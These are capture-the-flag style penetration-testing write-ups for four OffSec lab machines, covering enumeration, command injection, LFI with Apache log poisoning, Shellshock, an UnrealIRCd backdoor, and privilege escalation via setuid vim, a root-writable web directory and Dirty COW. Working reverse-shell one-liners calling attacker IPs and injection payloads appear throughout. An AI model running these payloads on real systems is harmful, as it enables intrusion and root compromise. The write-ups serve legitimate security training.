OffSec PG - Shakabrah, Solistice, Sumo, Sunset Noontide
Shakabrah
Enumeration
Machine IP → 192.168.80.86
Network Scan
Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.80.86
OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel
| Port | Service | Other details (if any) |
|---|---|---|
| 22 | SSH | OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) |
| 80 | HTTP | Apache httpd 2.4.29 ((Ubuntu)) |
Web Scan
GoBuster scan → gobuster dir -u http://192.168.80.86 -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt
Directories/files listed →
- index.php
Exploitation
The webpage is basically a php file that executes ping to a given IP address and rendered the result. This is however, vulnerable to command injection. Therefore, IP addresses or domains can be appended with ; whoami to execute the command and retrieve the result.
This is because user input is directly passed to the backend to execute and retrieve the result. This is the RCE observed. This is used to retrieve the /etc/passwd file which has two users of interest → dylan and root.
The RCE can also be used to take a look inside the /home/ directory and the files inside the user dylan’s home were readable by www-data user RCE, which gives the user flag.
Further, to get a shell, the usual reverse shell one liners are used. None of them worked. Thus followed a convention to look at listening ports using netstat -ntaup. These ports are more likely to not be denied connections “to” since they are allowed ports on the machine for connections “from” other addresses.
The shell payload that worked was rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1|nc 192.168.49.172 80 > /tmp/f with the netcat instance listening on port 80. This gave a shell as www-data.
Privilege Escalation
Looking at the setuid binaries in the system, an interesting one is vim.basic because vim allows executing shell commands.
Therefore, a shell can be lanuched by using vim.basic -c ':! bash' command. However, this does not set the privileges. The uid is still that of www-data.
This can be done by using python since it is there on the system, otherwise a C code would have to be compiled and executed. The python command can be executed as follows →
1
vim.basic -c ':py3 import os; os.setuid(0); os.system("/bin/bash")'
This gives the root shell and thus the root flag.
Solistice
Enumeration
Machine IP → 192.168.124.72
Network Scan
Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.124.72
OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel
| Port | Service | Other details (if any) |
|---|---|---|
| 21 | FTP | pyftpdlib 1.5.6 |
| 22 | SSH | OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) |
| 25 | SMTP | Exim smtpd |
| 80 | HTTP | Apache httpd 2.4.38 ((Debian)) |
| 2121 | FTP | pyftpdlib 1.5.6 → Anonymous Login Allowed |
| 3128 | HTTP Proxy | Squid http proxy 4.6 |
| 8593 | HTTP | PHP cli server 5.5 or later (PHP 7.3.14-1) → PHPSESSID HTTPOnly flag not set |
| 54787 | HTTP | PHP cli server 5.5 or later (PHP 7.3.14-1) |
| 62524 | - | - |
Web Scan
GoBuster scan → gobuster dir -u http://192.168.124.72 -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php
Nothing interesting was revealed in any of the ports.
Exploitation
LFI
The web server running at port 8593 has the ability to list books via PHP. This is done via a get parameter. Trying LFI with ../../../../../../etc/passwd confirms LFI and gives the result of the file to list possible users which includes www-data, miguel and root.
Transition LFI to Apache log poisoning
The default apache error logs are located at /var/log/apache2/error.log. This is readable on the browser because of the LFI vulnerability. Therefore, adding php code to an attempt would add it to the error log and subsequently render it on the webpage.
Therefore visiting the url http://192.168.124.72/<?php system($_GET['cmd']);?> should add it to the error log, thereby giving an RCE for the get request parameter in the LFI url. The access via the browser encodes the special characters, therefore a burp repeater request modification should do the trick.
Exploiting the RCE
With the php payload injected into the access log, the lfi url can be modified to add the parameter value for the cmd variable. Testing with id works. Next, this can used to test if nc, wget, etc. exist on the system which can be used to create a shell payload. This is the RCE on the server.
Both netcat and bash shell exist, therefore sending a payload nc -e /bin/bash 192.168.49.124 3002 with a listener active on the local machine gives a shell with the user www-data.
Privilege Escalation
Looking at the setuid files and directories using find / -perm -u=s 2>/dev/null, there is a server running at /var/tmp/sv which is a directory that is owned by root and is world-writable.
This has an index.php file which just prints that the site is under construction. This cannot be observed from any of the ports enumerated above. Checked the status of this under processes using ps aux | grep root | grep sv. This confirms that the server is actually running, but on localhost only. Therefore, this php file can be edited to have a payload that connects back to the attacker machine to get a reverse shell. Due to the permissions, this would be the root shell.
The pentest monkey reverse shell is uploaded to the server and the contents of the index.php file are overwritten with them. Then the execution can be done as follows on the low privileged shell → curl http://localhost:57/index.php
This gives a shell as the root user and thus the root flag as well.
Sumo
Enumeration
Machine IP → 192.168.101.87
Network Scan
Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.101.87
OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel
| Port | Service | Other details (if any) |
|---|---|---|
| 22 | SSH | OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) |
| 80 | HTTP | Apache httpd 2.2.22 ((Ubuntu)) |
Web Scan
GoBuster scan → gobuster dir -u http://192.168.101.87 -f -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt
Directories/files listed →
- index.html
- cgi-bin/ (403)
- icons/ (403)
- doc/ (403)
Exploitation
The cgi-bin/ directory looked suspicious. Generally in the past, cgi-bins used to be executed by bash directly and were vulnerable to shellshock. There is however a 403 on the directory. Running it through gobuster again tells the existence of test under that directory. Navigating to it shows that it is the default cgi-bin for the server.
The test for vulnerability for shellshock can be done as follows → curl -H "My-Header: () { :; }; echo; /usr/bin/id" http://192.168.101.87/cgi-bin/test. If this returns a valid result, then the server is vulnerable.
It was found that the server was in fact vulnerable. Therefore, used this as an RCE to get a reverse shell using the following payload → /bin/bash -i >& /dev/tcp/192.168.49.101/3002 0>&1.
This gave a shell as the user www-data and subsequently the user flag.
Privilege Escalation
Looked at the kernel version which is 3.2.0-23-generic. This is very outdated. The OS version is Ubuntu 12.04. The machine is also 64 bit. Looking at results of searchsploit, dirty cow is an exploit that would fit the scenario.
There are 4 kinds of dirty cow, the one used for this machine is 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd method). Compiling the exploit and sending the binary via wget allows setting a new user with root permissions.
Then, logging in with the newly created user gives the root shell and subseqeuntly the root flag.
Sunset Noontide
Enumeration
Machine IP → 192.168.56.120
Network Scan
Nmap scan → nmap -sC -sV -Pn -p- -A -o nmap.txt 192.168.56.120
OS Detection → Host: irc.foonet.com
| Port | Service | Other details (if any) |
|---|---|---|
| 6667, 6697, 8067 | IRC | UnrealIRCd |
Exploitation
The only service is an IRC, so searched exploit db via searchsploit for an exploit. This returned 4 entries. Looking at the code for the first one, there seems to be a backdoor which allows execution of shell commands when anything start with AB;.
Therefore, access can be checked by connecting to the IRCd via netcat and sending the the payload as AB;echo "a" | nc 192.168.49.56 3002. With a listener active on the attacking machine with the IP as in the payload, a conection and the letter “a” would be received.
Therefore, a similar payload can be used to receive shell via nc → AB;nc 192.168.49.56 3002 -e /bin/bash. This gives a shell as the server user. The home directory has the user flag.
Privilege Escalation
With the shell of the server user, trying default creds of root:root works for getting the shell to root. This gives the root flag.